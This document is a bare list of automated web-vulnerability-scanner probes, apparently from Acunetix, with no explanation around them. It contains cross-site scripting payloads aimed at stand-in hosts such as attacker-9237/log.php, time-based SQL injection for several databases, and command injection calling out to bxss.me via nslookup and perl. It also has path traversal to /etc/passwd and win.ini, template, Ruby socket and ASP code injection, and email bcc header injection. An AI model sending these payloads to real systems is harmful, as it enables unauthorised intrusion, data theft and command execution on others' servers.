http://attacker-9237/log.php?
}body{acu:Expre/**/SSion(4HTG(9318))}
\u003CScRiPt\4HTG(9307)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%34%48%54%47%289368%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9891/log.php?
}body{acu:Expre/**/SSion(fwW9(9327))}
\u003CScRiPt\fwW9(9110)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%66%77%57%39%289006%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9922/log.php?
}body{acu:Expre/**/SSion(noTd(9415))}
\u003CScRiPt\noTd(9772)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%6E%6F%54%64%289714%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9156/log.php?
}body{acu:Expre/**/SSion(tzWR(9811))}
\u003CScRiPt\tzWR(9065)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%74%7A%57%52%289586%29%3C%2F%73%43%72%69%70%54%3E
http://attacker-9385/log.php?
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
}body{acu:Expre/**/SSion(cUtG(9016))}
\u003CScRiPt\cUtG(9259)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%63%55%74%47%289301%29%3C%2F%73%43%72%69%70%54%3E
acu10980<s1﹥s2ʺs3ʹuca10980
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
''||(select 1 from (select pg_sleep(15))x)||''
'||(select 1 from (select pg_sleep(15))x)||'
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
lROIix1s')) OR 722=(SELECT 722 FROM PG_SLEEP(15))--
pqrfGo7O') OR 554=(SELECT 554 FROM PG_SLEEP(15))--
4ZAeJdGL' OR 696=(SELECT 696 FROM PG_SLEEP(15))--
-1)) OR 990=(SELECT 990 FROM PG_SLEEP(15))--
-5) OR 933=(SELECT 933 FROM PG_SLEEP(15))--
-5 OR 598=(SELECT 598 FROM PG_SLEEP(15))--
1 waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(sele...
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1 OR 3+690-690-1=0+0+0+1
-1 OR 2+690-690-1=0+0+0+1
`(nslookup hitzwphpmflcpb634a.bxss.me||perl -e "gethostbyname('hitzwphpmflcpb634a.bxss.me')")`
|(nslookup hitzmiqghbyyq74c66.bxss.me||perl -e "gethostbyname('hitzmiqghbyyq74c66.bxss.me')")
&(nslookup hitstapcfwrvz61e82.bxss.me||perl -e "gethostbyname('hitstapcfwrvz61e82.bxss.me')")&'\"...
$(nslookup hitauqbmigwdx36187.bxss.me||perl -e "gethostbyname('hitauqbmigwdx36187.bxss.me')")
(nslookup hitljhbbjuxrv5e24a.bxss.me||perl -e "gethostbyname('hitljhbbjuxrv5e24a.bxss.me')")
|echo ifzbea$()\ npxyts\nz^xyu||a #' |echo ifzbea$()\ npxyts\nz^xyu||a #|" |echo ifzbea$()\ npxyt...
&echo hjdiqq$()\ iqoiwi\nz^xyu||a #' &echo hjdiqq$()\ iqoiwi\nz^xyu||a #|" &echo hjdiqq$()\ iqoiw...
echo guejbe$()\ omgkuu\nz^xyu||a #' &echo guejbe$()\ omgkuu\nz^xyu||a #|" &echo guejbe$()\ omgkuu...
http://bxss.me/t/fit.txt?.jpg
1some_inexistent_file_with_long_name
'+'A'.concat(70-3).concat(22*4).concat(102).concat(89).concat(107).concat(67)+(require'socket'
So...
HttP://bxss.me/t/xss.html?%00
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
"+"A".concat(70-3).concat(22*4).concat(103).concat(84).concat(120).concat(90)+(require"socket"
So...
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../etc/passwd
".gethostbyname(lc("hitly"."ctuqgawrc2487.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(83)....
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'.gethostbyname(lc('hitjw'.'iceweepi1ca81.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(79)...
"+response.write(9933571*9654144)+"
'+response.write(9933571*9654144)+'
to@example.com>
bcc:074625.19373-155076.19373.ba498.19130.2@bxss.me
ctime
sleep
p0
(I30
tp1
Rp2
.
response.write(9933571*9654144)
bcc:074625.19373-155075.19373.ba498.19130.2@bxss.me